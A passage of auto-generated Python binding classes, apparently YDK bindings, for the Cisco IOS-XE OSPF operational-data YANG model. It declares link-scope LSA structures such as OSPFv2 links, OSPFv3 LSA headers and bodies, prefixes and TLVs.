OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv2UnknownTlv(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__() self.yang_name = "ospfv2-unknown-tlv" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['type'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('value', (YLeafList(YType.uint8, 'value'), ['int'])), ]) self.type = None self.length = None self.value = [] self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value) class Ospfv3LsaVal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__() self.yang_name = "ospfv3-lsa-val" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa-val" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa-val" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3PrefixList(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__() self.yang_name = "ospfv3-prefix-list" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "link-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value) class Tlv(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, self).__init__() self.yang_name = "tlv" self.yang_parent_name = 